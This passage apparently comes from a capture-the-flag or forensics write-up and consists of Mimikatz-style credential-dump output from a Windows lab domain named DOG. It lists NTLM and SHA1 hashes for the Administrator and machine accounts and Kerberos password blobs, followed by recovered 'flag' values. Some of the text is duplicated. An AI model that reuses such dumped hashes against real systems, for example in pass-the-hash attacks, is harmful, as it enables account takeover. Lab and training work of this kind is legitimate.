* Password : 27 2d 17 f2 4b 16 db a8 ef d4 82 a5 49 dc f3 35 3e a8 d8 ad 08 73 fd 21 01 f5 2d b0 95 ec b2 5f 76 c1 ec e6 98 3f 41 54 af 9c 59 6c 6e 01 06 d3 b0 79 dc 42 c4 7f 3d a5 f3 61 ef fa 33 74 50 8c 84 9f 05 14 45 86 c0 4f 2f c6 8b 30 4f 4b 37 b4 ad 8d db ae eb 44 5d e4 39 e7 c3 be 6d f6 37 2e 41 ad 3f 35 3d a6 b8 1c e9 91 e6 f3 60 9d 21 c4 f8 9e 5f 0f 24 95 38 90 6b da 27 c0 2d 86 3a 5d 58 19 56 7f ad 68 3f 6e 4a de e2 fd 02 bd 0b af 06 3b 73 47 26 ab ce ba 72 96 ce 8f 21 1d 42 34 9a 5f 87 79 d5 20 07 63 b5 a9 ad 59 4d 96 6f 7f c8 d8 8f cd 0d 56 72 96 45 58 ad 55 66 f5 a4 6c 05 49 5b b2 fb e8 eb 5a 36 f2 9d 69 1f 69 fb b7 6f 19 43 01 43 c9 96 c4 18 73 24 52 ff 1c 15 62 3d 79 f3 6c 75 2e 38 28 07 5f 7f e0 e1 62 05 a0
ssp : KO
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:15:00
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 94901a951ee2d32e070982b4276eebd6
* SHA1 : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 27364 (00000000:00006ae4)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/4/3 7:12:58
SID :
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 94901a951ee2d32e070982b4276eebd6
* SHA1 : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
tspkg :
wdigest :
kerberos :
ssp : KO
credman :
Authentication Id : 0 ; 40540109 (00000000:026a97cd)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/11 11:49:36
SID : S-1-5-90-2
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 94901a951ee2d32e070982b4276eebd6
* SHA1 : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : dog.local
* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2
ssp : KO
credman :
Authentication Id : 0 ; 480371 (00000000:00075473)
Session : Interactive from 1
User Name : Administrator
Domain : DOG
Logon Server : WIN-MVNE1SFJ0LQ
Logon Time : 2024/4/3 7:29:29
SID : S-1-5-21-2515766443-2959740750-3575737072-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DOG
* NTLM : e054e61488f2545292d4e5b9f722d9a2
* SHA1 : 6aec174b0d46521c233a254120538a6bddecc0c7
[00010000] CredentialKeys
* NTLM : e054e61488f2545292d4e5b9f722d9a2
* SHA1 : 6aec174b0d46521c233a254120538a6bddecc0c7
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
wdigest :
* Username : Administrator
* Domain : DOG
* Password : (null)
kerberos :
* Username : Administrator
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/4/3 7:15:16
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 55865 (00000000:0000da39)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/4/3 7:15:11
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* NTLM : 94901a951ee2d32e070982b4276eebd6
* SHA1 : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : dog.local
* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2
ssp : KO
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:12:52
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :
全部的sessions
flag1
0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F
flag2
E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F
flag3?
3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2
nType from 0
User Name : WIN-MVNE1SFJ0LQ$
Domain : DOG
Logon Server : (null)
Logon Time : 2024/4/3 7:12:52
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-MVNE1SFJ0LQ$
* Domain : DOG
* Password : (null)
kerberos :
* Username : win-mvne1sfj0lq$
* Domain : DOG.LOCAL
* Password : (null)
ssp : KO
credman :
全部的sessions
[外链图片转存中...(img-AN9KgVtz-1727602850327)]
flag1
0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F
flag2
E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F
flag3?
3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2